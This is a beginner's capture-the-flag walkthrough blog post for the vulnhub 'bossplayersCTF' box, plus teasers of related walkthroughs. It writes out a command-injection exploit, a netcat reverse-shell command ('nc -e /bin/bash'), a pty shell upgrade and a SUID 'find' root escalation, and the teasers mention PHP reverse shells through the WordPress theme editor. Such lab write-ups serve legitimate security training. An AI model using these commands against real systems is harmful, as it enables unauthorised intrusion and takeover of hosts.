bossplayersCTF ( For beginners)

-

This Box is from vulhub you can download it from Link

For this box you have to have knowledge of simple html,encoding an decoding (base64),nc(for reverse shell),find permission for root (privilege escalation).


Breaching Process 

Finding IP

  • Nmap

Enumeration

  • Browsing HTTP service
  • Enumerating directory
  • Found robots.txt

Exploitation

  • Got base64 
  • Decoded and got direcory
  • nc revserse shell

Privilege Escalation

  • Gaining access to root using find 


Let's Breach 

Using nmap we scan the network ip in our network

nmap -sn  ip_range (use root permission to scan )


After scanning, the IP of machine was 192.168.43.4

after finding the ip we go for Enumeration (this is the phase where you have to see every single piece of information)

I go for dirb scan and found robots.txt


Then i got for robots.txt without consuming time and got base64 encoded text decoded it but got trolled. Saying try harder




Then i go for more enumeration where i go for source page one by one and then found some random text at last page of source 

The code was encoded in base64 thrice time and it was simple to decode so i decoded the text and found workinginprogress.php


Surfing the decoded directory 



In this page we can use ping command so command execution from browse.
so i check can i execute other command link whoami,ifconfig if i can then i can ger reverse shell from nc 




whoami command run fine then time to got reverse shell
for reverse shell i use 
nc -e /bin/bash ip port


seems like it execute the bash shell and i got the low privilege shell of www-data

in my terminal


The shell seems not good so i imported tty shell of bash using python 

python -c 'import pty;pty.spawn("/bin/bash")'



Now let's find the permission

find / -perm -u=s -type f 2>/dev/null
and seems like find command can be executed as root without any password


so,
I google for find command to run as root if the root user gave the find command as root permission without password

find . -exec /bin/bash -p \; -quit

okay the cool thing was i got root permission and the challenge was done




The flag was encoded in base64.so,decoding it i got

congratulation





:) Happy hacking 














































Comments

Post a Comment

Popular posts from this blog

Wordpress Reverse Shell

-
Image
Wordpress Reverse Shell This post is related to WordPress security testing to identify what will be possible procedure to exploit WordPress by compromising admin console. We have already setup WordPress in our windows 7 machine. Table of Content 1) Metasploit Framework 3) Upload PHP reverse shell 4) Getting reverse shell connection Requirement: Host machine: WordPress Attacker machine: Kali Linux WordPress Credential: admin: password Let's begin 1) 1st Method  The site which we are going to test is: i login into the wordpress admin Now i check upload the reverse shell (PHP) using metasploit BOOOOOOM : I got the interactive shell of windows 7 machine Let's breach in another way 2) 2nd Method I have already done login into wordpress using admin and password So, Create a PHP code file using msfvenom Now Go to the Apprereance -> Theme editor -> 404.php templetes past a php code ...
Read more

SAR1 VULHUB WALKTHROUGH

-
Image
SAR1 (Walkthrough) This Box Is From Vulhub You Can Download It From  Link .This Box is like OSCP box which i beleive is .I pwned this box using LFI leads to RCE. Breaching Process  Finding IP Netdiscover Enumeration Browsing HTTP  service Nmap scan Enumerating directory using nikto and dirb Found robots.txt and other useful directory Enumerating sar2HTML Exploitation using searchsploit for sar2HTML found RCE Injecting php code using (wget) Got reverse shell using NC Privilege Escalation Found crontab execute shell in 5 min. Add the sudoers permission for www-data. Got root permission  Let's Breach   Using netdiscover  i found the box ip address.The ip address was 192.168.248.136 Then i scan the IP using nmap The command is nmap -sSVC -A 192.168.248.136 | tee nmap.txt Here the scan shows only 80 port which was default page of apache There was no thing to see so,i need to dig d...
Read more

EVM: 1 Vulnhub Walkthrough

-
Image
Penetration Methodologies: Finding IP Nmap Enumeration Browsing HTTP Service Directory Bruteforce using dirb Enumeration Using WPScan Password Bruteforce using WPScan Getting Login Credentials Exploitation Exploiting using Metasploit  Getting a reverse connection  Spawning a TTY Shell  Enumeration for Root Credentials Privilege Escalation  Getting Login Credentials Logging in as root Reading the Final Flag Let's Breach:     First of all finding IP for the machine i use bridge connection.The IP of machine was 192.168.1.5 I quickly nmap the website found 80 open Then i browse the server and found that apache default page and phpinfo() Nothing interesting then i bruteforce the directory you can use gobuster and nikto also While scan is complete i found a wordpress directory that leads me to an another website Then i quickly browse the http://192.168.1.5/wordpress then i found the page d...
Read more